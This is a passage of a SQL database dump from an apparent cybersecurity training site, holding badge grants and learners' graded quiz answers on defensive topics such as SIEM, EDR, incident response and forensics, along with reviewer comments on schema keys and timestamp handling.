(1806, 213, 1651, '2026-03-15', 0, 0, 0, NULL),
(1807, 213, 1691, '2026-03-15', 0, 0, 0, NULL),
(1808, 213, 1695, '2026-03-15', 0, 0, 0, NULL),
(1809, 283, 1712, '2026-03-15', 0, 0, 0, NULL),
(1810, 283, 1665, '2026-03-15', 0, 0, 0, NULL),
(1811, 28, 1650, '2026-03-15', 0, 0, 0, NULL),
(1812, 28, 1681, '2026-03-15', 0, 0, 0, NULL),
(1813, 28, 1672, '2026-03-15', 0, 0, 0, NULL),
(1814, 28, 1662, '2026-03-15', 0, 0, 0, NULL),
(1815, 28, 1684, '2026-03-15', 0, 0, 0, NULL),
(1816, 214, 1682, '2026-03-16', 0, 0, 0, NULL),
(1817, 214, 1649, '2026-03-16', 0, 0, 0, NULL),
(1818, 214, 1694, '2026-03-16', 0, 0, 0, NULL),
(1819, 214, 1678, '2026-03-16', 0, 0, 0, NULL),
(1820, 214, 1676, '2026-03-16', 0, 0, 0, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `user_badges`
--

-- One row per badge granted to a user.
-- This statement declares no PRIMARY KEY, UNIQUE or FOREIGN KEY; phpMyAdmin
-- dumps usually add keys and AUTO_INCREMENT in a later ALTER TABLE, so check
-- there that (`user_id`, `badge_id`) is constrained -- nothing in this
-- definition prevents the same badge being recorded twice for one user.
CREATE TABLE `user_badges` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,   -- NOTE(review): presumably a users row id; no FK declared here
  `badge_id` int(11) NOT NULL,  -- NOTE(review): presumably a badges row id; no FK declared here
  `earned_at` timestamp NULL DEFAULT current_timestamp(),  -- TIMESTAMP: converted through the session time zone on dump/import
  `awarded_at` datetime DEFAULT current_timestamp()        -- DATETIME: stored and dumped as-is, no time-zone conversion
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_badges`
--

-- Badge grant data. Observations on these rows (no schema change implied):
--  * ids 1-5 all carry awarded_at = '2026-01-13 21:26:08' although their
--    earned_at values span 2025-12-26 .. 2026-01-12; this looks like a one-off
--    backfill of the newer column -- TODO confirm, and prefer earned_at as the
--    grant time for those rows.
--  * from id 7 onward awarded_at is exactly earned_at + 3 hours in every row,
--    consistent with earned_at (TIMESTAMP) being dumped in UTC and awarded_at
--    (DATETIME) holding server-local time -- confirm before using either
--    column in an audit timeline, and do not treat the two as independent.
--  * id 6 is absent; nothing here says whether it was deleted.
INSERT INTO `user_badges` (`id`, `user_id`, `badge_id`, `earned_at`, `awarded_at`) VALUES
(1, 34, 1, '2025-12-26 01:00:05', '2026-01-13 21:26:08'),
(2, 1, 1, '2025-12-26 15:29:20', '2026-01-13 21:26:08'),
(3, 42, 1, '2025-12-30 13:40:31', '2026-01-13 21:26:08'),
(4, 65, 1, '2026-01-06 16:28:31', '2026-01-13 21:26:08'),
(5, 74, 1, '2026-01-12 06:32:13', '2026-01-13 21:26:08'),
(7, 107, 1, '2026-02-02 15:00:17', '2026-02-02 18:00:17'),
(8, 34, 12, '2026-02-05 19:27:03', '2026-02-05 22:27:03'),
(9, 34, 13, '2026-02-05 19:27:03', '2026-02-05 22:27:03'),
(10, 183, 1, '2026-02-20 04:23:32', '2026-02-20 07:23:32'),
(11, 214, 1, '2026-02-27 06:31:25', '2026-02-27 09:31:25'),
(12, 232, 1, '2026-03-03 06:05:08', '2026-03-03 09:05:08'),
(13, 237, 1, '2026-03-04 16:20:30', '2026-03-04 19:20:30'),
(14, 225, 1, '2026-03-05 04:46:03', '2026-03-05 07:46:03'),
(15, 260, 1, '2026-03-07 11:50:16', '2026-03-07 14:50:16'),
(16, 42, 10, '2026-03-12 11:46:50', '2026-03-12 14:46:50'),
(17, 42, 12, '2026-03-12 11:46:50', '2026-03-12 14:46:50'),
(18, 42, 13, '2026-03-12 11:46:50', '2026-03-12 14:46:50'),
(19, 283, 10, '2026-03-12 12:07:05', '2026-03-12 15:07:05'),
(20, 283, 1, '2026-03-12 12:08:06', '2026-03-12 15:08:06'),
(21, 283, 13, '2026-03-12 12:25:44', '2026-03-12 15:25:44'),
(22, 283, 12, '2026-03-12 12:35:34', '2026-03-12 15:35:34'),
(23, 283, 9, '2026-03-12 21:46:42', '2026-03-13 00:46:42'),
(24, 225, 8, '2026-03-13 02:58:27', '2026-03-13 05:58:27'),
(25, 225, 12, '2026-03-13 02:58:27', '2026-03-13 05:58:27'),
(26, 225, 10, '2026-03-15 10:40:40', '2026-03-15 13:40:40'),
(27, 225, 11, '2026-03-15 10:40:40', '2026-03-15 13:40:40'),
(28, 232, 13, '2026-03-15 15:59:21', '2026-03-15 18:59:21'),
(29, 303, 1, '2026-03-15 17:37:43', '2026-03-15 20:37:43'),
(30, 232, 12, '2026-03-15 18:12:05', '2026-03-15 21:12:05'),
(31, 225, 13, '2026-03-16 03:27:16', '2026-03-16 06:27:16');

-- --------------------------------------------------------

--
-- Table structure for table `user_lesson_answers`
--

-- One row per answer a user submits to a lesson question.
-- No PRIMARY KEY, UNIQUE or FOREIGN KEY is declared in this statement (keys
-- are expected in a later ALTER TABLE of the dump); in particular nothing
-- here makes (`user_id`, `question_id`) unique, so a re-submission would add
-- a second row rather than replace the first -- TODO confirm intended.
CREATE TABLE `user_lesson_answers` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,      -- NOTE(review): presumably a users row id; no FK declared here
  `question_id` int(11) NOT NULL,  -- NOTE(review): presumably a lesson question id; no FK declared here
  `submitted_answer` text DEFAULT NULL,  -- text supplied by the user; treat as untrusted and escape wherever it is rendered
  `is_correct` tinyint(1) DEFAULT NULL,  -- 0/1 grading result; NULL default means "not graded" -- TODO confirm with the grading code
  `submitted_at` timestamp NULL DEFAULT current_timestamp()  -- TIMESTAMP: converted through the session time zone on dump/import
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_lesson_answers`
--

INSERT INTO `user_lesson_answers` (`id`, `user_id`, `question_id`, `submitted_answer`, `is_correct`, `submitted_at`) VALUES
(14, 1, 4164, 'Risk reduction', 1, '2025-12-26 15:29:20'),
(15, 1, 4165, 'SOC team', 1, '2025-12-26 15:29:20'),
(16, 1, 4166, 'Context', 1, '2025-12-26 15:29:20'),
(32, 34, 5522, 'ERROR', 1, '2025-12-26 21:14:00'),
(33, 34, 5523, 'db_admin', 1, '2025-12-26 21:14:00'),
(34, 34, 5524, 'users_db', 1, '2025-12-26 21:14:00'),
(35, 1, 6475, 'Analysis and Context', 1, '2025-12-29 13:52:47'),
(36, 1, 6476, 'A report advising to block an IP due to active ransomware targeting your industry', 1, '2025-12-29 13:53:26'),
(37, 1, 6477, 'To support decision making', 1, '2025-12-29 13:53:26'),
(38, 42, 4164, 'Integrity', 1, '2025-12-30 13:40:30'),
(39, 42, 4165, 'To trick users into revealing information', 1, '2025-12-30 13:40:31'),
(40, 42, 4166, 'SOC Analyst', 1, '2025-12-30 13:40:31'),
(41, 42, 4167, 'Detection', 1, '2025-12-30 13:41:34'),
(42, 42, 4168, 'Threat actor', 1, '2025-12-30 13:41:34'),
(43, 42, 4169, 'High priority', 1, '2025-12-30 13:41:34'),
(44, 42, 4170, 'Log data', 1, '2025-12-30 13:42:10'),
(45, 42, 4171, 'Confirmed threat', 1, '2025-12-30 13:42:10'),
(46, 42, 4172, 'High priority', 1, '2025-12-30 13:42:10'),
(47, 42, 4173, 'Protection', 1, '2025-12-30 13:42:40'),
(48, 42, 4174, 'Detection', 1, '2025-12-30 13:42:40'),
(49, 42, 4175, 'Security tool', 1, '2025-12-30 13:42:40'),
(50, 42, 4176, 'Threat actor', 1, '2025-12-30 13:43:10'),
(51, 42, 4177, 'Log data', 1, '2025-12-30 13:43:10'),
(52, 42, 4178, 'Context', 1, '2025-12-30 13:43:10'),
(53, 42, 5339, 'Network', 1, '2025-12-30 13:45:54'),
(54, 42, 5340, 'Segments', 1, '2025-12-30 13:45:54'),
(55, 42, 5341, 'Presentation', 1, '2025-12-30 13:45:54'),
(56, 42, 5342, 'TCP', 1, '2025-12-30 13:46:37'),
(57, 42, 5343, 'Speed', 1, '2025-12-30 13:46:37'),
(58, 42, 5344, 'Internet', 1, '2025-12-30 13:46:37'),
(59, 42, 5345, '192.168.1.10', 1, '2025-12-30 13:47:41'),
(60, 42, 5346, '32', 1, '2025-12-30 13:47:41'),
(61, 42, 5347, 'NAT', 1, '2025-12-30 13:47:42'),
(62, 42, 5348, '/24', 1, '2025-12-30 13:50:19'),
(63, 42, 5349, '254', 1, '2025-12-30 13:50:19'),
(64, 42, 5350, 'Network ID', 1, '2025-12-30 13:50:19'),
(65, 42, 5351, 'A', 1, '2025-12-30 13:51:39'),
(66, 42, 5352, 'MX', 1, '2025-12-30 13:51:39'),
(67, 42, 5353, 'DNS', 1, '2025-12-30 13:51:39'),
(68, 42, 5354, 'Discover', 1, '2025-12-30 13:52:49'),
(69, 42, 5355, 'IP to MAC', 1, '2025-12-30 13:52:49'),
(70, 42, 5356, 'ARP Spoofing', 1, '2025-12-30 13:52:49'),
(71, 42, 5357, '22', 1, '2025-12-30 13:53:51'),
(72, 42, 5358, 'Telnet', 1, '2025-12-30 13:53:51'),
(73, 42, 5359, 'SMB', 1, '2025-12-30 13:53:51'),
(74, 65, 4164, 'Integrity', 1, '2026-01-06 16:28:30'),
(75, 65, 4165, 'To trick users into revealing information', 1, '2026-01-06 16:28:30'),
(76, 65, 4166, 'SOC Analyst', 1, '2026-01-06 16:28:31'),
(77, 74, 4164, 'Integrity', 1, '2026-01-12 06:32:11'),
(78, 74, 4165, 'To trick users into revealing information', 1, '2026-01-12 06:32:12'),
(79, 74, 4166, 'SOC Analyst', 1, '2026-01-12 06:32:13'),
(80, 74, 5522, 'ERROR', 1, '2026-01-12 06:52:12'),
(81, 74, 5523, 'db_admin', 1, '2026-01-12 06:52:12'),
(82, 74, 5524, 'users_db', 1, '2026-01-12 06:52:12'),
(83, 74, 4167, 'Detection', 1, '2026-01-17 08:38:33'),
(84, 74, 4168, 'Threat actor', 1, '2026-01-17 08:38:33'),
(85, 74, 4169, 'High priority', 1, '2026-01-17 08:38:34'),
(86, 74, 4170, 'Log data', 1, '2026-01-17 08:39:29'),
(87, 74, 4171, 'Confirmed threat', 1, '2026-01-17 08:39:31'),
(88, 74, 4172, 'High priority', 1, '2026-01-17 08:39:31'),
(89, 74, 4173, 'Protection', 1, '2026-01-17 08:40:22'),
(90, 74, 4174, 'Detection', 1, '2026-01-17 08:40:23'),
(91, 74, 4175, 'Security tool', 1, '2026-01-17 08:40:23'),
(92, 74, 4176, 'Threat actor', 1, '2026-01-17 08:41:01'),
(93, 74, 4177, 'Log data', 1, '2026-01-17 08:41:02'),
(94, 74, 4178, 'Context', 1, '2026-01-17 08:41:02'),
(95, 107, 4167, 'Detection', 1, '2026-02-02 15:00:16'),
(96, 107, 4168, 'Threat actor', 1, '2026-02-02 15:00:17'),
(97, 107, 4169, 'High priority', 1, '2026-02-02 15:00:17'),
(98, 107, 4170, 'Log data', 1, '2026-02-02 15:12:43'),
(99, 107, 4171, 'Confirmed threat', 1, '2026-02-02 15:12:43'),
(100, 107, 4172, 'High priority', 1, '2026-02-02 15:12:49'),
(101, 107, 4173, 'Protection', 1, '2026-02-02 15:17:43'),
(102, 107, 4174, 'Detection', 1, '2026-02-02 15:17:43'),
(103, 107, 4175, 'Security tool', 1, '2026-02-02 15:17:43'),
(104, 107, 4176, 'Threat actor', 1, '2026-02-02 15:21:56'),
(105, 107, 4177, 'Log data', 1, '2026-02-02 15:21:56'),
(106, 107, 4178, 'Context', 1, '2026-02-02 15:21:56'),
(107, 107, 4164, 'Integrity', 1, '2026-02-02 15:27:09'),
(108, 107, 4165, 'To trick users into revealing information', 1, '2026-02-02 15:27:10'),
(109, 107, 4166, 'SOC Analyst', 1, '2026-02-02 15:27:10'),
(110, 183, 5522, 'ERROR', 1, '2026-02-20 04:23:32'),
(111, 183, 5523, 'db_admin', 1, '2026-02-20 04:23:32'),
(112, 183, 5524, 'users_db', 1, '2026-02-20 04:23:32'),
(113, 214, 5522, 'ERROR', 1, '2026-02-27 06:31:24'),
(114, 214, 5523, 'db_admin', 1, '2026-02-27 06:31:25'),
(115, 214, 5524, 'users_db', 1, '2026-02-27 06:31:25'),
(116, 214, 5525, '2', 1, '2026-02-27 06:36:06'),
(117, 214, 5526, 'root', 1, '2026-02-27 06:36:06'),
(118, 214, 5527, '2222', 1, '2026-02-27 06:36:06'),
(119, 232, 5881, 'Connecting related events to detect threats', 1, '2026-03-03 06:05:06'),
(120, 232, 5882, 'Compliance and Forensic Investigation', 1, '2026-03-03 06:05:07'),
(121, 232, 5883, 'Forwarder / Agent', 1, '2026-03-03 06:05:07'),
(122, 232, 5884, 'Syslog', 1, '2026-03-04 03:50:28'),
(123, 232, 5885, 'Traffic metadata (Who talked to Whom)', 1, '2026-03-04 03:50:29'),
(124, 232, 5886, 'To accurately correlate events across the world', 1, '2026-03-04 03:50:30'),
(125, 232, 5887, 'Converting mixed formats into a standard field structure', 1, '2026-03-04 03:56:29'),
(126, 232, 5888, 'Maps them to a single field like user.name', 1, '2026-03-04 03:56:29'),
(127, 232, 5889, 'Parsing', 1, '2026-03-04 03:56:30'),
(128, 232, 5890, 'Multiple failed logins in a short time', 1, '2026-03-04 04:43:36'),
(129, 232, 5891, 'Logins from two distant locations in an impossibly short time', 1, '2026-03-04 04:43:37'),
(130, 232, 5892, 'Tuning', 1, '2026-03-04 04:43:37'),
(131, 232, 5893, 'SPL (Search Processing Language)', 1, '2026-03-04 04:44:53'),
(132, 232, 5894, 'KQL (Kusto Query Language)', 1, '2026-03-04 04:44:54'),
(133, 232, 5895, 'High cost', 1, '2026-03-04 04:44:54'),
(134, 232, 5896, 'Kibana', 1, '2026-03-04 04:52:02'),
(135, 232, 5897, 'Elasticsearch', 1, '2026-03-04 04:52:03'),
(136, 232, 5898, 'Lightweight data shippers/agents', 1, '2026-03-04 04:52:03'),
(137, 232, 5899, 'It includes XDR features like FIM and Active Response', 1, '2026-03-04 16:17:54'),
(138, 232, 5900, 'The ability to automatically block/stop a threat', 1, '2026-03-04 16:17:55'),
(139, 232, 5901, 'Yes', 1, '2026-03-04 16:17:55'),
(140, 232, 5902, 'Mapping different log formats to standard fields', 1, '2026-03-04 16:19:05'),
(141, 232, 5903, 'A SIEM is only as good as the log data fed into it', 1, '2026-03-04 16:19:05'),
(142, 232, 5904, 'Logins from two locations physically impossible to traverse in the time', 1, '2026-03-04 16:19:06'),
(143, 232, 5905, 'Splunk', 1, '2026-03-04 16:19:06'),
(144, 232, 5906, 'Microsoft Sentinel', 1, '2026-03-04 16:19:07'),
(145, 232, 5907, 'Wazuh', 1, '2026-03-04 16:19:07'),
(146, 232, 5908, 'Elasticsearch', 0, '2026-03-04 16:19:07'),
(147, 232, 5909, 'Sends logs from the endpoint to the SIEM', 1, '2026-03-04 16:19:08'),
(148, 232, 5910, 'Compliance regulations often require keeping logs for 1 year+', 1, '2026-03-04 16:19:08'),
(149, 237, 4164, 'Integrity', 1, '2026-03-04 16:20:29'),
(150, 237, 4165, 'To trick users into revealing information', 1, '2026-03-04 16:20:30'),
(151, 237, 4166, 'SOC Analyst', 1, '2026-03-04 16:20:30'),
(152, 232, 5911, '192.168.1.55', 1, '2026-03-05 04:02:09'),
(153, 232, 5912, 'Yes, the last log says \"Accepted\"', 1, '2026-03-05 04:02:09'),
(154, 232, 5913, 'root', 1, '2026-03-05 04:02:10'),
(155, 225, 4164, 'Integrity', 1, '2026-03-05 04:46:02'),
(156, 225, 4165, 'To trick users into revealing information', 1, '2026-03-05 04:46:02'),
(157, 225, 4166, 'SOC Analyst', 1, '2026-03-05 04:46:03'),
(158, 225, 4167, 'Detection', 1, '2026-03-05 04:49:20'),
(159, 225, 4168, 'Threat actor', 1, '2026-03-05 04:49:21'),
(160, 225, 4169, 'High priority', 1, '2026-03-05 04:49:21'),
(161, 225, 4170, 'Log data', 1, '2026-03-05 04:53:12'),
(162, 225, 4171, 'Confirmed threat', 1, '2026-03-05 04:53:12'),
(163, 225, 4172, 'High priority', 1, '2026-03-05 04:53:12'),
(164, 225, 4173, 'Protection', 1, '2026-03-05 04:55:04'),
(165, 225, 4174, 'Detection', 1, '2026-03-05 04:55:05'),
(166, 225, 4175, 'Security tool', 1, '2026-03-05 04:55:05'),
(167, 225, 4176, 'Threat actor', 1, '2026-03-05 04:56:37'),
(168, 225, 4177, 'Log data', 1, '2026-03-05 04:56:37'),
(169, 225, 4178, 'Context', 1, '2026-03-05 04:56:38'),
(170, 232, 5914, '5 Minutes', 1, '2026-03-05 05:26:13'),
(171, 232, 5915, 'Machines are precise, humans are random', 1, '2026-03-05 05:26:13'),
(172, 232, 5916, '45.33.2.1', 1, '2026-03-05 05:26:14'),
(173, 232, 5917, '1 hour 15 minutes', 1, '2026-03-05 05:30:24'),
(174, 232, 5918, 'alice@company.com', 1, '2026-03-05 05:30:25'),
(175, 232, 5919, 'Credential Theft', 1, '2026-03-05 05:30:25'),
(176, 260, 4164, 'Integrity', 1, '2026-03-07 11:50:14'),
(177, 260, 4165, 'To trick users into revealing information', 1, '2026-03-07 11:50:15'),
(178, 260, 4166, 'SOC Analyst', 1, '2026-03-07 11:50:15'),
(179, 232, 5920, 'Domain Admins', 1, '2026-03-07 15:09:28'),
(180, 232, 5921, '4728', 1, '2026-03-07 15:09:29'),
(181, 232, 5922, 'Off-hours changes are suspicious', 1, '2026-03-07 15:09:29'),
(182, 232, 5923, 'Exfiltrated Data (Encoded)', 1, '2026-03-08 09:13:56'),
(183, 232, 5924, 'Firewalls usually allow Port 53 (DNS) outbound', 1, '2026-03-08 09:13:57'),
(184, 232, 5925, 'Length and High Entropy (Randomness)', 1, '2026-03-08 09:13:57'),
(185, 260, 4167, 'Detection', 1, '2026-03-08 09:14:30'),
(186, 260, 4168, 'Threat actor', 1, '2026-03-08 09:14:31'),
(187, 260, 4169, 'High priority', 1, '2026-03-08 09:14:31'),
(188, 232, 5926, 'Updating', 0, '2026-03-08 09:15:33'),
(189, 232, 5927, 'BLOCK', 1, '2026-03-08 09:15:33'),
(190, 232, 5928, '4624', 1, '2026-03-08 09:15:33'),
(191, 232, 5929, '02:00 AM', 1, '2026-03-08 09:15:34'),
(192, 232, 5930, 'A \"Success\" or \"Accepted\" log after failures', 1, '2026-03-08 09:15:34'),
(193, 232, 5931, 'Regular time intervals (Heartbeat)', 1, '2026-03-08 09:15:34'),
(194, 260, 4170, 'Log data', 1, '2026-03-08 09:33:21'),
(195, 260, 4171, 'Confirmed threat', 1, '2026-03-08 09:33:22'),
(196, 260, 4172, 'High priority', 1, '2026-03-08 09:33:22'),
(197, 260, 4173, 'Protection', 1, '2026-03-08 09:46:04'),
(198, 260, 4174, 'Detection', 1, '2026-03-08 09:46:05'),
(199, 260, 4175, 'Security tool', 1, '2026-03-08 09:46:05'),
(200, 232, 5932, 'Endpoint activities (Processes, Files, Network)', 1, '2026-03-08 09:47:56'),
(201, 232, 5933, 'Isolating a machine from the network', 1, '2026-03-08 09:47:56'),
(202, 232, 5934, 'On each endpoint (laptop/server)', 1, '2026-03-08 09:47:56'),
(203, 232, 5935, 'Signatures (File Hashes)', 1, '2026-03-08 09:50:03'),
(204, 232, 5936, 'Zero-Day', 1, '2026-03-08 09:50:03'),
(205, 232, 5937, 'Full context and telemetry (Process Tree, etc.)', 1, '2026-03-08 09:50:04'),
(206, 260, 4176, 'Threat actor', 1, '2026-03-08 09:56:55'),
(207, 260, 4177, 'Log data', 1, '2026-03-08 09:56:56'),
(208, 260, 4178, 'Context', 1, '2026-03-08 09:56:56'),
(209, 232, 5938, 'Which process started which other process', 1, '2026-03-08 10:16:48'),
(210, 232, 5939, 'explorer.exe', 1, '2026-03-08 10:16:49'),
(211, 232, 5940, 'Office apps should not spawn shells', 1, '2026-03-08 10:16:49'),
(212, 232, 5941, 'services.exe', 1, '2026-03-08 10:18:45'),
(213, 232, 5942, 'A malicious VBA Macro', 1, '2026-03-08 10:18:45'),
(214, 232, 5943, 'Base64-encoded script (often malicious)', 1, '2026-03-08 10:18:46'),
(215, 232, 5944, 'The Office application (Word/Excel)', 1, '2026-03-08 10:21:32'),
(216, 232, 5945, 'Using built-in tools (PowerShell, WMI) instead of malware', 1, '2026-03-08 10:21:32'),
(217, 232, 5946, 'It can download files (LOLBIN)', 1, '2026-03-08 10:21:33'),
(218, 232, 5947, 'CrowdStrike', 1, '2026-03-08 10:35:48'),
(219, 232, 5948, 'Microsoft Defender for Endpoint', 1, '2026-03-08 10:35:48'),
(220, 232, 5949, 'SentinelOne', 1, '2026-03-08 10:35:48'),
(221, 232, 5950, 'WINWORD.EXE', 1, '2026-03-08 10:37:51'),
(222, 232, 5951, 'A malicious email attachment (phishing)', 1, '2026-03-08 10:37:51'),
(223, 232, 5952, 'Reconnaissance / Discovery', 1, '2026-03-08 10:37:51'),
(224, 232, 5953, 'Base64-encoded command (obfuscation)', 1, '2026-03-08 10:37:52'),
(225, 232, 5954, 'EDR provides visibility and behavior analysis', 1, '2026-03-08 10:37:55'),
(226, 232, 5955, 'winlogon.exe', 0, '2026-03-08 10:37:56'),
(227, 232, 5956, 'At network choke points (e.g., behind firewall)', 1, '2026-03-08 11:26:57'),
(228, 232, 5957, 'Blind to encrypted traffic (TLS)', 1, '2026-03-08 11:26:58'),
(229, 232, 5958, 'OSSEC / Wazuh', 1, '2026-03-08 11:26:58'),
(230, 232, 5959, 'Cannot detect Zero-Day (unknown) attacks', 1, '2026-03-08 14:19:54'),
(231, 232, 5960, 'Baseline', 1, '2026-03-08 14:19:55'),
(232, 232, 5961, 'Anomaly-Based', 1, '2026-03-08 14:19:55'),
(233, 232, 5962, 'Signature ID', 1, '2026-03-08 14:25:48'),
(234, 232, 5963, 'Logs and generates an alert', 1, '2026-03-08 14:25:48'),
(235, 232, 5964, '-> (Arrow)', 1, '2026-03-08 14:25:48'),
(236, 232, 5965, 'Multi-threading (uses all CPU cores)', 1, '2026-03-08 14:33:26'),
(237, 232, 5966, 'Yes', 1, '2026-03-08 14:33:27'),
(238, 232, 5967, 'Saves suspicious files from network traffic', 1, '2026-03-08 14:33:27'),
(239, 232, 5968, 'Read the alert message to understand the claim', 1, '2026-03-08 14:46:02'),
(240, 232, 5969, 'Scanners like Nessus trigger \"Port Scan\" rules', 1, '2026-03-08 14:46:02'),
(241, 232, 5970, 'Adjusting it to reduce false positives', 1, '2026-03-08 14:46:03'),
(242, 232, 5971, 'HIDS', 0, '2026-03-08 14:47:30'),
(243, 232, 5972, 'HIDS', 1, '2026-03-08 14:47:30'),
(244, 232, 5973, 'A database of known attack patterns', 1, '2026-03-08 14:47:31'),
(245, 232, 5974, 'Zero-Day attacks', 1, '2026-03-08 14:47:31'),
(246, 232, 5975, 'Suricata', 1, '2026-03-08 14:47:32'),
(247, 232, 5976, 'The alert message text', 1, '2026-03-08 14:47:32'),
(248, 232, 5977, 'Ransomware', 1, '2026-03-09 13:56:57'),
(249, 232, 5978, 'Worms spread without user interaction', 1, '2026-03-09 13:56:58'),
(250, 232, 5979, 'Malware that lives in RAM, not on disk', 1, '2026-03-09 13:56:58'),
(251, 232, 5980, 'Examining malware without executing it', 1, '2026-03-09 13:58:27'),
(252, 232, 5981, 'Sandbox escape', 1, '2026-03-09 13:58:28'),
(253, 232, 5982, 'strings command', 1, '2026-03-09 13:58:28'),
(254, 232, 5983, 'To prevent the malware from reaching the internet', 1, '2026-03-09 14:00:36'),
(255, 232, 5984, 'A pre-configured Windows VM for malware analysis', 1, '2026-03-09 14:00:36'),
(256, 232, 5985, 'Take a snapshot', 1, '2026-03-09 14:00:37'),
(257, 232, 5986, 'The file is packed or encrypted', 1, '2026-03-09 14:03:32'),
(258, 232, 5987, 'Memory allocation for code injection', 1, '2026-03-09 14:03:32'),
(259, 232, 5988, 'To check VirusTotal for known info', 1, '2026-03-09 14:03:33'),
(260, 232, 5989, 'Interactive malware sandboxing', 1, '2026-03-09 14:04:51'),
(261, 232, 5990, 'Persistence (auto-start)', 1, '2026-03-09 14:04:52'),
(262, 232, 5991, 'Looking for VM artifacts or lack of user activity', 1, '2026-03-09 14:04:52'),
(263, 232, 5992, 'Indicators of Compromise', 1, '2026-03-09 14:12:49'),
(264, 232, 5993, 'A unique name to prevent multiple instances', 1, '2026-03-09 14:12:50'),
(265, 232, 5994, 'MITRE ATT&CK', 1, '2026-03-09 14:12:50'),
(266, 232, 5995, 'Rootkit', 1, '2026-03-09 14:13:35'),
(267, 232, 5996, 'RAT (Remote Access Trojan)', 1, '2026-03-09 14:13:35'),
(268, 232, 5997, 'Dynamic Analysis', 1, '2026-03-09 14:13:35'),
(269, 232, 5998, 'Dynamic Analysis', 0, '2026-03-09 14:13:36'),
(270, 232, 5999, 'Windows PE (Executable) files', 1, '2026-03-09 14:13:36'),
(271, 232, 6000, 'Evading sandbox analysis', 1, '2026-03-09 14:13:37'),
(272, 232, 6004, '4', 1, '2026-03-09 17:37:39'),
(273, 232, 6005, 'Containment, Eradication & Recovery', 1, '2026-03-09 17:37:40'),
(274, 232, 6006, 'Loop back to Preparation (improvement)', 1, '2026-03-09 17:37:40'),
(275, 232, 6007, 'A step-by-step guide for handling specific incidents', 1, '2026-03-09 17:54:55'),
(276, 232, 6008, 'Pre-packed forensic tools for on-site response', 1, '2026-03-09 17:54:55'),
(277, 232, 6009, 'To know what normal looks like', 1, '2026-03-09 17:54:56'),
(278, 232, 6010, 'Validate if it is a True Positive', 1, '2026-03-09 18:04:04'),
(279, 232, 6011, 'A timeline of events', 1, '2026-03-09 18:04:04'),
(280, 232, 6012, 'FBI, vendor, or partner', 1, '2026-03-09 18:04:04'),
(281, 232, 6013, 'Immediate actions to stop the attack', 1, '2026-03-09 18:05:07'),
(282, 232, 6014, 'Volatile memory (RAM) evidence is lost', 1, '2026-03-09 18:05:08'),
(283, 232, 6015, 'Isolating compromised systems while keeping them accessible', 1, '2026-03-09 18:05:08'),
(284, 232, 6016, 'Malware and persistence mechanisms', 1, '2026-03-09 18:06:00'),
(285, 232, 6017, 'Validate it is clean', 1, '2026-03-09 18:06:00'),
(286, 232, 6018, 'To detect re-infection before spreading', 1, '2026-03-09 18:06:00'),
(287, 232, 6019, 'Within 1-2 weeks of incident closure', 1, '2026-03-09 18:06:54'),
(288, 232, 6020, 'Document what happened and recommendations', 1, '2026-03-09 18:06:55'),
(289, 232, 6021, 'Update SIEM rules, playbooks, and train staff', 1, '2026-03-09 18:06:55'),
(290, 232, 6022, 'NIST SP 800-61', 1, '2026-03-09 18:07:51'),
(291, 232, 6023, 'Preparation', 1, '2026-03-09 18:07:51'),
(292, 232, 6024, 'Containment', 1, '2026-03-09 18:07:51'),
(293, 232, 6025, 'It contains forensic evidence lost on shutdown', 1, '2026-03-09 18:07:52'),
(294, 232, 6026, 'Playbook', 1, '2026-03-09 18:07:52'),
(295, 232, 6027, 'Lessons Learned and improvement', 1, '2026-03-09 18:07:53'),
(296, 232, 6001, 'Computer Security Incident Response Team', 1, '2026-03-09 18:08:50'),
(297, 232, 6002, 'It ensures consistent and fast response', 1, '2026-03-09 18:08:50'),
(298, 232, 6003, 'Malware infection', 1, '2026-03-09 18:08:50'),
(299, 232, 6028, 'Preserve the evidence', 1, '2026-03-09 18:09:49'),
(300, 232, 6029, 'Memory Forensics', 1, '2026-03-09 18:09:49'),
(301, 232, 6030, 'eDiscovery and litigation support', 1, '2026-03-09 18:09:49'),
(302, 232, 6031, 'Identification', 1, '2026-03-09 18:10:32'),
(303, 232, 6032, 'FTK Imager', 1, '2026-03-09 18:10:33'),
(304, 232, 6033, 'Chain of Custody', 1, '2026-03-09 18:10:33'),
(305, 232, 6034, 'Evidence may be inadmissible in court', 1, '2026-03-09 18:11:18'),
(306, 232, 6035, 'Allows reading but prevents writing to evidence', 1, '2026-03-09 18:11:18'),
(307, 232, 6036, 'Photograph the scene', 1, '2026-03-09 18:11:18'),
(308, 232, 6037, 'To preserve the original evidence', 1, '2026-03-09 18:12:21'),
(309, 232, 6038, 'Physical Image', 1, '2026-03-09 18:12:22'),
(310, 232, 6039, 'Compare hashes of source and image', 1, '2026-03-09 18:12:22'),
(311, 232, 6040, 'Master File Table - database of all files', 1, '2026-03-09 18:13:07'),
(312, 232, 6041, 'Hiding data attached to files', 1, '2026-03-09 18:13:07'),
(313, 232, 6042, 'Modifying timestamps to hide activity', 1, '2026-03-09 18:13:07'),
(314, 232, 6043, 'SAM', 1, '2026-03-09 18:13:50'),
(315, 232, 6044, 'Programs that have been executed', 1, '2026-03-09 18:13:51'),
(316, 232, 6045, 'C:\\Windows\\System32\\winevt', 1, '2026-03-09 18:13:51'),
(317, 232, 6046, 'Preserve the evidence', 1, '2026-03-09 18:14:21'),
(318, 232, 6047, 'Volatility', 1, '2026-03-09 18:14:22'),
(319, 232, 6048, 'Writing to evidence (preserve integrity)', 1, '2026-03-09 18:14:22'),
(320, 232, 6049, 'Prefetch', 1, '2026-03-09 18:14:22'),
(321, 232, 6050, 'Alternate Data Streams (ADS)', 1, '2026-03-09 18:14:23'),
(322, 232, 6051, 'Verify image integrity', 1, '2026-03-09 18:14:23'),
(323, 232, 6067, 'Bro', 1, '2026-03-10 16:36:40'),
(324, 232, 6068, 'conn.log', 1, '2026-03-10 16:36:40'),
(325, 232, 6069, 'Zeek generates structured logs, better for automation', 1, '2026-03-10 16:36:41'),
(326, 232, 6070, 'Wireshark', 0, '2026-03-10 16:37:26'),
(327, 232, 6071, 'http.request', 1, '2026-03-10 16:37:28'),
(328, 232, 6072, 'SYN, SYN-ACK, ACK', 1, '2026-03-10 16:37:28'),
